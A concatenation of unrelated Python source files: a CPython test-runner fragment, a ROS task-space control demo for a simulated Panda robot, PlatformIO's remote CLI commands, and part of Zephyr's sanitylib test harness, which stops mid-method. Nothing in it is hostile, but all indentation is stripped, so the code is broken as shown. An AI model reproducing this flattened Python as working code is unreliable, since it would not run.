# change the CWD, the original CWD will be used. The original CWD is
# available from support.SAVEDCWD.
with support.temp_cwd(TESTCWD, quiet=True):
main()
|
task_space_control_with_fri.py
|
#!/usr/bin/env python
# /***************************************************************************
#
# @package: panda_siimulator_examples
# @metapackage: panda_simulator
# @author: Saif Sidhik <sxs1412@bham.ac.uk>
#
# **************************************************************************/
# /***************************************************************************
# Copyright (c) 2019-2021, Saif Sidhik
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************/
"""
This is a demo showing task-space control on the
simulator robot using the Franka ROS Interface
(https://github.com/justagist/franka_ros_interface).
( A more unified package called panda_robot is
available which simplifies and combines all the
functionalities of Franka ROS Interface and
provides a simpler and intuitive python API.
https://github.com/justagist/panda_robot )
The task-space force for the desired pose is computed
using a simple PD law, and the corresponding
joint torques are computed and sent to the robot.
USAGE:
After launching the simulator (panda_world.launch),
run this demo using the command:
roslaunch panda_simulator_examples demo_task_space_control.launch --use_fri:=true
"""
import copy
import rospy
import threading
import quaternion
import numpy as np
from geometry_msgs.msg import Point
from visualization_msgs.msg import *
from interactive_markers.interactive_marker_server import *
from franka_interface import ArmInterface
# -- add to pythonpath for finding rviz_markers.py
import sys, os
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
# -------------------------------------------------
from rviz_markers import RvizMarkers
# --------- Modify as required ------------
# Task-space controller parameters
# stiffness gains
P_pos = 50.
P_ori = 25.
# damping gains
D_pos = 10.
D_ori = 1.
# -----------------------------------------
publish_rate = 100
JACOBIAN = None
CARTESIAN_POSE = None
CARTESIAN_VEL = None
destination_marker = RvizMarkers()
def quatdiff_in_euler(quat_curr, quat_des):
"""
Compute difference between quaternions and return
Euler angles as difference
"""
curr_mat = quaternion.as_rotation_matrix(quat_curr)
des_mat = quaternion.as_rotation_matrix(quat_des)
rel_mat = des_mat.T.dot(curr_mat)
rel_quat = quaternion.from_rotation_matrix(rel_mat)
vec = quaternion.as_float_array(rel_quat)[1:]
if rel_quat.w < 0.0:
vec = -vec
return -des_mat.dot(vec)
def control_thread(rate):
"""
Actual control loop. Uses goal pose from the feedback thread
and current robot states from the subscribed messages to compute
task-space force, and then the corresponding joint torques.
"""
while not rospy.is_shutdown():
error = 100.
while error > 0.005:
# when using the panda_robot interface, the next 2 lines can be simplified
# to: `curr_pos, curr_ori = panda.ee_pose()`
curr_pos = robot.endpoint_pose()['position']
curr_ori = np.asarray(robot.endpoint_pose()['orientation'])
delta_pos = (goal_pos - curr_pos).reshape([3,1])
delta_ori = quatdiff_in_euler(curr_ori, goal_ori).reshape([3,1])
# when using the panda_robot interface, the next 2 lines can be simplified
# to: `curr_vel, curr_omg = panda.ee_velocity()`
curr_vel = robot.endpoint_velocity()['linear'].reshape([3,1])
curr_omg = robot.endpoint_velocity()['angular'].reshape([3,1])
# Desired task-space force using PD law
F = np.vstack([P_pos*(delta_pos), P_ori*(delta_ori)]) - \
np.vstack([D_pos*(curr_vel), D_ori*(curr_omg)])
error = np.linalg.norm(delta_pos) + np.linalg.norm(delta_ori)
# panda_robot equivalent: panda.jacobian(angles[optional]) or panda.zero_jacobian()
J = robot.zero_jacobian()
# joint torques to be commanded
tau = np.dot(J.T,F)
# command robot using joint torques
# panda_robot equivalent: panda.exec_torque_cmd(tau)
robot.set_joint_torques(dict(list(zip(robot.joint_names(), tau))))
rate.sleep()
def process_feedback(feedback):
"""
InteractiveMarker callback function. Update target pose.
"""
global goal_pos, goal_ori
if feedback.event_type == InteractiveMarkerFeedback.MOUSE_UP:
p = feedback.pose.position
q = feedback.pose.orientation
goal_pos = np.array([p.x,p.y,p.z])
goal_ori = np.quaternion(q.w, q.x,q.y,q.z)
def _on_shutdown():
"""
Clean shutdown controller thread when rosnode dies.
"""
global ctrl_thread
if ctrl_thread.is_alive():
ctrl_thread.join()
if __name__ == "__main__":
# global goal_pos, goal_ori, ctrl_thread
rospy.init_node("ts_control_sim_only")
# when using franka_ros_interface, the robot can be controlled through and
# the robot state is directly accessible with the API
# If using the panda_robot API, this will be
# panda = PandaArm()
robot = ArmInterface()
# when using the panda_robot interface, the next 2 lines can be simplified
# to: `start_pos, start_ori = panda.ee_pose()`
ee_pose = robot.endpoint_pose()
start_pos, start_ori = ee_pose['position'], ee_pose['orientation']
goal_pos, goal_ori = start_pos, start_ori
# start controller thread
rospy.on_shutdown(_on_shutdown)
rate = rospy.Rate(publish_rate)
ctrl_thread = threading.Thread(target=control_thread, args = [rate])
ctrl_thread.start()
# ------------------------------------------------------------------------------------
server = InteractiveMarkerServer("basic_control")
position = Point( start_pos[0], start_pos[1], start_pos[2])
marker = destination_marker.makeMarker( False, InteractiveMarkerControl.MOVE_ROTATE_3D, \
position, quaternion.as_float_array(start_ori), True)
server.insert(marker, process_feedback)
server.applyChanges()
rospy.spin()
# ------------------------------------------------------------------------------------
|
remote.py
|
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, fs
from platformio.commands import device
from platformio.managers.core import pioplus_call
from platformio.project.exception import NotPlatformIOProjectError
# pylint: disable=unused-argument
@click.group("remote", short_help="PIO Remote")
@click.option("-a", "--agent", multiple=True)
def cli(**kwargs):
pass
@cli.group("agent", short_help="Start new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(**kwargs):
pioplus_call(sys.argv[1:])
@remote_agent.command("reload", short_help="Reload agents")
def remote_agent_reload():
pioplus_call(sys.argv[1:])
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
pioplus_call(sys.argv[1:])
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
"--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
def remote_update(only_check, dry_run):
pioplus_call(sys.argv[1:])
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
def remote_run(**kwargs):
pioplus_call(sys.argv[1:])
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
def remote_test(**kwargs):
pioplus_call(sys.argv[1:])
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
def device_list(json_output):
pioplus_call(sys.argv[1:])
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
"--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
"--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)",
)
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)",
)
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
"-e",
"--environment",
help="Load configuration from `platformio.ini` and specified environment",
)
@click.pass_context
def device_monitor(ctx, **kwargs):
project_options = {}
try:
with fs.cd(kwargs["project_dir"]):
project_options = device.get_project_options(kwargs["environment"])
kwargs = device.apply_project_monitor_options(kwargs, project_options)
except NotPlatformIOProjectError:
pass
kwargs["baud"] = kwargs["baud"] or 9600
def _tx_target(sock_dir):
pioplus_argv = ["remote", "device", "monitor"]
pioplus_argv.extend(device.options_to_argv(kwargs, project_options))
pioplus_argv.extend(["--sock", sock_dir])
try:
pioplus_call(pioplus_argv)
except exception.ReturnErrorCode:
pass
sock_dir = mkdtemp(suffix="pioplus")
sock_file = os.path.join(sock_dir, "sock")
try:
t = threading.Thread(target=_tx_target, args=(sock_dir,))
t.start()
while t.is_alive() and not os.path.isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
kwargs["port"] = fs.get_file_contents(sock_file)
ctx.invoke(device.device_monitor, **kwargs)
t.join(2)
finally:
fs.rmtree(sock_dir)
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
import platform
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash is not None:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
#there is possibility we polled nothing because
#of host not scheduled QEMU process enough CPU
#time during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state != 'failed':
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
handler.set_state(out_state, handler_time)
if out_state == "timeout":
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.reason = "Failed"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
